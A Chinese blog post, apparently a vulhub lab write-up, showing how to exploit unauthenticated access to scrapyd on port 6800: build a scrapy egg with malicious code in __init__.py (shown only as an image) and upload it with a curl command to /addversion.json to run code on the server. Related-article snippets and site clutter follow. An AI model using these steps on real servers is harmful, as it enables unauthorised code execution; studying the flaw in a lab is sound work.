scrapyd 未授权访问漏洞

最新推荐文章于 2024-04-11 14:58:50 发布
最新推荐文章于 2024-04-11 14:58:50 发布
阅读量664 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119139222
版权

漏洞简介

scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。
参考文章:https://www.leavesongs.com/PENETRATION/attack-scrapy.html

漏洞复现

构造一个恶意的scrapy包,构造前需要安装scrapyscrapyd-client

pip install scrapy
pip install scrapyd-client

然后使用命令:

scrapy startproject evil
cd evil
# 编辑 evil/__init__.py, 加入恶意代码
scrapyd-deploy --build-egg=evil.egg

恶意代码:
在这里插入图片描述

最后向API接口发送恶意包,即可执行代码:

curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

在这里插入图片描述
返回靶机查看:
在这里插入图片描述

注意:

  • 有关于scrapyd-deploy的报错处理可以在这篇文章中找到
小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
scrapyd 授权访问漏洞getshell
ST________的博客
05-27 502
scrapyd 授权访问漏洞getshell 简介 scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html 漏洞复现 访问http://192.168.1.182:6800/,漏洞存在 本地安装scrapy框架,并创建一个scrapy项目: pip
【vulfocus漏洞复现】scrapyd 授权访问漏洞
一剑开天门!的博客
03-14 7065
【vulfocus漏洞复现】scrapyd 授权访问漏洞
scrapyd 部署项目说被被拒绝访问
de20050138的博客
09-19 329
修改访问地址为0.0.0.0 后就可以部署成功 Python目录下\Python36\Lib\site-packages\scrapyd的default_scrapyd.conf 解决方法的来源
scrapyd部署的巨坑
andytopxu的专栏
04-06 789
scrapy项目在使用scrapyd部署的时候,如果某个*.py里使用了相对路径的文件。 例如:self.fontB=TTFont(self.FILE_PATH+"******.**f") 使用部署指令:scrapyd-deploy **P -p **** 后,就会报下面的错误!! 这个一个天坑,整了一天,网上资料尽是如何常规部署,这个资料很难很难查到。 下面两则文章救了我。 h...
Scrapy爬虫程序监控平台构建(一):ScrapyScrapyd
weixin_38924500的博客
12-10 898
1.基础知识 1.1 scrapyscrapyd、scrapydweb是什么? scrapy一个爬虫框架,可以通过工程将繁杂的爬虫程序统一在一起。Scrapy框架介绍 scrapyd相当于一个组件,能够将scrapy项目进行远程部署,调度使用等。因此scrapyd可以看作一个cs(client-server)程序,它是一个服务,因此我们需要安装和配置scrapyd(server)。 scrapydweb是一个基于scrapyd-API的可视化组件,集成并且提供更多可视化功能和更优美的界面。同类型的WEB还
scrapyd 安装包
07-01
Scrapy,Python开发的一个快速、高层次的屏幕抓取和web抓取框架,用于抓取web站点并从页面中提取结构化的数据。Scrapy用途广泛,可以用于数据挖掘、监测和自动化测试。 Scrapy吸引人的地方在于它是一个框架,任何人...
DJango跟Scrapy爬虫框架实现-ScrapydAPI
04-27
在本文中,我们将深入探讨如何使用Django与Scrapy这两个流行的Python框架,结合Scrapyd API,构建一个针对Zol硬件评价的情绪分析系统,以帮助用户判断是否应该购买某一产品。我们将详细介绍每个组件的作用以及它们...
scrapyd schedule.json setting 传入多个值问题
10-16
Scrapyd是一个用于部署和管理Scrapy爬虫的工具,它允许你远程调度、启动、停止和监控爬虫。在使用Scrapyd时,我们可能会遇到需要传递多个设置(settings)给爬虫的情况,特别是在调整爬虫的行为或者适应不同的运行...
scrapyd的安装与部署
07-13
Scrapyd是一个Python项目,用于管理和调度Scrapy爬虫项目。本文主要介绍如何在不同的操作系统环境下安装和部署Scrapyd,以及如何配置和使用相关的工具和库。 首先,要安装Scrapyd及其依赖,需要使用Python的包管理...
scrapyd项目部署1
08-08
Scrapyd 的优点: 1. 支持多个爬虫管理,每个爬虫可以有多个版本。 2. 可以通过 http 命令方式发布、删除、启动、停止爬虫程序。 3. 可以同时管理多个爬虫项目。 在部署 Scrapyd 项目时,我们需要考虑到以下几点: ...
墨者学院—Webmin经身份验证的远程代码执行(简单复习)
LRedAnt的博客
12-25 1450
墨者学院—Webmin经身份验证的远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-1...
scrapy的使用(一): Scrapyd 部署监控 scrapy 爬虫任务流程
qq_40120187的博客
04-28 1948
Scrapyd服务 是用来部署、远程监控scrapy 的服务。1. 环境安装     Sudo  pip  install  scrapyd  (安装scrapyd 服务端)     Sudo  pip  install  scrapyd client (安装 scrapyd 客户端)     如果在 window 上,还需要安装 curl 包(链家下载)。并添加到环境变量(把 .exe 添加到环...
授权访问漏洞总结
热门推荐
七月_的博客
08-20 2万+
Web端 http://219.141.242.77:7777/pe-admin/ #后台授权访问 http://219.141.242.77:7777/pe-admin/main.jsp 参考:华泰保险某系统漏洞打包(授权访问\弱口令\Getshell) 服务端 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被...
浅谈“授权访问漏洞
→_→
07-26 1万+
一:漏洞名称: 授权访问漏洞 描述: 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。 检测条件: 已知Web网站具有登录页面。或者具有不允许访问的目录或功能。 不用登录,可通过链接直接访问用户页面功能。 检测方法: 通过对登录后的页面进行抓包,将抓取到的功能链接,在其他浏览器进行打开, 也可以通过web扫描工具进行扫描,爬虫得到相关地址链接,进.
Alibaba Druid授权访问漏洞记录(敏感目录,端口:不确定)
墨痕诉清风的博客
11-12 1万+
1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池.2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控.
Scrapy框架内存泄漏问题及解决
最新发布
zhu6201976的博客
04-11 1538
Scrapy框架内存泄漏问题及解决
python爬虫之Scrapy介绍九——scrapyd部署scrapy项目
Claire_chen_jia的博客
07-20 455
1 scrapyd的介绍 scrapyd是一个用于部署和运行scrapy爬虫的程序,它允许你通过JSON API来部署爬虫项目和控制爬虫运行,scrapyd是一个守护进程,监听爬虫的运行和请求,然后启动进程来执行它们 所谓json api本质就是post请求的webapi 网址:https://scrapyd.readthedocs.io/en/latest/ 1.1 scrapyed安装 scrapyd服务端安装: pip install scrapyd scrapyd客户端安装: pip install
Linux部署Scrapyd及配置功能
kong
09-30 6171
文章目录版本介绍1、Python3环境的安装2、Scrapyd的安装3、Scrapy配置文件4、Scrapy启动5、访问认证6、Scrapyd-client的安装7、Scrapyd API的安装8、Scrapyrt的安装9、Scrapyd的功能10、supervisor10、其他yum安装 版本介绍 python-3.6.5 scrapyd-1.2.0 1、Python3环境的安装 Centos下...
django scrapyd
07-25
Django Scrapyd是一个基于Django框架开发的web界面,用于管理和监控Scrapy爬虫的部署和运行。它可以让你通过web界面来管理Scrapy爬虫的任务,包括启动、停止和监控任务的状态等。 要使用Django Scrapyd,首先需要在Django项目中安装Scrapyd库。可以通过在项目的虚拟环境中运行以下命令来安装: ``` pip install django-scrapyd ``` 安装完成后,需要在Django项目的settings.py文件中添加以下配置: ```python INSTALLED_APPS = [ ... 'django_scrapyd', ... ] SCRAPYD_URL = 'http://localhost:6800' ``` 然后在urls.py文件中添加以下配置: ```python from django.urls import include, path urlpatterns = [ ... path('scrapyd/', include('django_scrapyd.urls')), ... ] ``` 完成以上配置后,就可以通过访问`http://localhost:8000/scrapyd/`来打开Django Scrapyd的web界面了。 在界面上,你可以看到已部署的Scrapy爬虫和它们的运行状态。你可以选择启动、停止或删除任务,并查看任务的日志和统计信息。 希望这个简单介绍对你有帮助!如果还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值